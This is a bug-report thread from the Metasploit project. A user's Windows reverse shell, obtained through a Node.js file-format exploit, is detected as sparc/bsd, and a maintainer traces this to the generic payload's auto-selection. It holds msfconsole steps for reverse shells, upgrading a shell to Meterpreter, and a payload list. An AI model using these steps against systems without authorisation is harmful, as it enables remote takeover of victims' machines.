Metasploit-framework: Windows shell detected as shell sparc/bsd

Created on 26 Aug 2020 · 11 Comments · Source: rapid7/metasploit-framework

Steps to reproduce

How'd you do it?

  1. use exploit/multi/fileformat/js_unpacker_eval_injection
  2. Setting up with my ip and default port and generic/shell_reverse_tcp payload
  3. use multi/handler
  4. setting up with my ip and default port and generic/shell_reverse_tcp payload
  5. exploit -j
  6. and execute the node js script in my windows 10 x64
  7. and i type "sessions" and its output is like this:

     msf5 exploit(multi/handler) > sessions

     Active sessions

       Id  Name  Type             Information                                                                         Connection
       --  ----  ----             -----------                                                                         ----------
       1         shell sparc/bsd  Microsoft Windows [Version 10.0.18363.1016] (c) 2019 Microsoft Corporation. A...  192.168.0.8:4444 -> 192.168.0.6:55129 (192.168.0.6)

  8. and then i type "sessions -u 1" and the output is like this:

     msf5 exploit(multi/handler) > sessions -u 1
     [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

     [*] Upgrading session ID: 1
     [-] Shells on the target platform, bsd, cannot be upgraded to Meterpreter at this time.

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.
windows 10 x64 version 10.0.18363 build 18363

Were you following a specific guide/tutorial or reading documentation?

If yes link the guide/tutorial or documentation you were following here, otherwise you may omit this section.

Expected behavior

sessions detects it as "win" and the shell_to_meterpreter module runs without any error

Current behavior

What happens instead?
The shell_to_meterpreter module failed and the sessions output says it is bsd, not win.

You might also want to check the last ~1k lines of
/opt/metasploit/apps/pro/engine/config/logs/framework.log or
~/.msf4/logs/framework.log for relevant stack traces

System stuff

Metasploit version

Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install).
metasploit v5.0.101-dev

I installed Metasploit with:

  • [x] Kali package via apt
  • [ ] Omnibus installer (nightly)
  • [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
  • [ ] Source install (please specify ruby version)

OS

What OS are you running Metasploit on?
Kali Linux RPI 3B
Linux GetRektBoy724 4.19.118-Re4son-v8+ #1 SMP PREEMPT Wed May 6 12:44:21 UTC 2020 aarch64 GNU/Linux

bug

All 11 comments

PLEASE HELP MEEEEEE........ANY HELP IS APPRECIATED

Try again with setg LogLevel 3 and showing the last page of ~/.msf4/framework.log.

ok thx
i'll try it

this is my framework.log
https://pastebin.com/raw/tYC6ErDy
i already typed "setg LogLevel 3"

[08/27/2020 07:37:26] [d(2)] core: Selected payload bsd/sparc/shell_reverse_tcp from generic payload generic/shell_reverse_tcp

As I figured... Try setting PAYLOAD to a specific payload, not generic/shell_reverse_tcp. generic/shell_reverse_tcp will autoselect an appropriate payload, and it often guesses wrong.
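The mismatch in this thread is visible in two places: the framework.log line that records which concrete payload a generic/* payload was resolved to, and the `sessions` row whose Information banner disagrees with the platform in its Type column. Below is an added example (not code from the issue or from metasploit-framework) that parses both and flags the disagreement; the banner-to-platform hints are an assumption of this example, not how Metasploit itself classifies sessions.

```ruby
# Constructed samples, copied from the output quoted in this thread.
SESSION_ROW = '1 shell sparc/bsd Microsoft Windows [Version 10.0.18363.1016] (c) 2019 Microsoft Corporation. A... 192.168.0.8:4444 -> 192.168.0.6:55129 (192.168.0.6)'
LOG_LINE = '[08/27/2020 07:37:26] [d(2)] core: Selected payload bsd/sparc/shell_reverse_tcp from generic payload generic/shell_reverse_tcp'

# Banner-to-platform hints used only by this example (assumption; Metasploit does not detect platform this way).
BANNER_HINTS = {
  /Microsoft Windows \[Version/ => 'windows',
  /\bLinux\b/                   => 'linux',
  /\b(Free|Open|Net)BSD\b/      => 'bsd'
}.freeze

# Parse one row of the `sessions` table (Id, Type arch/platform, Information, Connection) into a hash; nil if it does not match.
def parse_session_row(row)
  m = row.match(%r{\A\s*(\d+)\s+(shell|meterpreter)\s+([\w-]+/[\w-]+)\s+(.*?)\s+(\S+ -> \S+ \([^)]+\))\s*\z})
  return nil unless m
  arch, platform = m[3].split('/')
  { id: m[1].to_i, type: m[2], arch: arch, platform: platform, info: m[4], connection: m[5] }
end

# Extract the concrete payload a generic/* payload was resolved to from a framework.log line; nil if absent.
def resolved_payload(log_line)
  m = log_line.match(/Selected payload (\S+) from generic payload (\S+)/)
  m && { selected: m[1], generic: m[2], platform: m[1].split('/').first }
end

# Guess the platform from the session banner text; nil when no hint matches.
def banner_platform(info)
  BANNER_HINTS.each { |re, plat| return plat if info.match?(re) }
  nil
end

# Return a warning when the session's registered platform disagrees with its banner, else nil.
def platform_mismatch(session)
  seen = banner_platform(session[:info])
  return nil if seen.nil? || seen == session[:platform]
  "session #{session[:id]}: registered as #{session[:platform]} but banner looks like #{seen}; " \
    "set an explicit #{seen}/* payload instead of a generic/* one"
end

if __FILE__ == $PROGRAM_NAME
  puts resolved_payload(LOG_LINE).inspect
  puts platform_mismatch(parse_session_row(SESSION_ROW))
end
```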

msf6 exploit(multi/fileformat/js_unpacker_eval_injection) > show payloads

Compatible Payloads
===================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  generic/custom                                    manual  No     Custom Payload
   1  generic/shell_bind_tcp                            manual  No     Generic Command Shell, Bind TCP Inline
   2  generic/shell_reverse_tcp                         manual  No     Generic Command Shell, Reverse TCP Inline
   3  multi/meterpreter/reverse_http                    manual  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures)
   4  multi/meterpreter/reverse_https                   manual  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures)
   5  nodejs/shell_bind_tcp                             manual  No     Command Shell, Bind TCP (via nodejs)
   6  nodejs/shell_reverse_tcp                          manual  No     Command Shell, Reverse TCP (via nodejs)
   7  nodejs/shell_reverse_tcp_ssl                      manual  No     Command Shell, Reverse TCP SSL (via nodejs)

msf6 exploit(multi/fileformat/js_unpacker_eval_injection) >

nodejs/shell_reverse_tcp seems to be what you want.

ohh ok thx
i'll try that

Can nodejs shell be changed to meterpreter?

YEAH BOIIII I GET METERPRETER!!!!!
So in the nodejs payload i still set it as generic/shell_reverse_tcp
but in the handler i set it as windows/shell_reverse_tcp
and i ran shell_to_meterpreter and i got it yayy

THX FOR YOUR ADVICE @wvu-r7

Payload and handler should match if possible. Sounds like you got it either way. Enjoy! :+1:
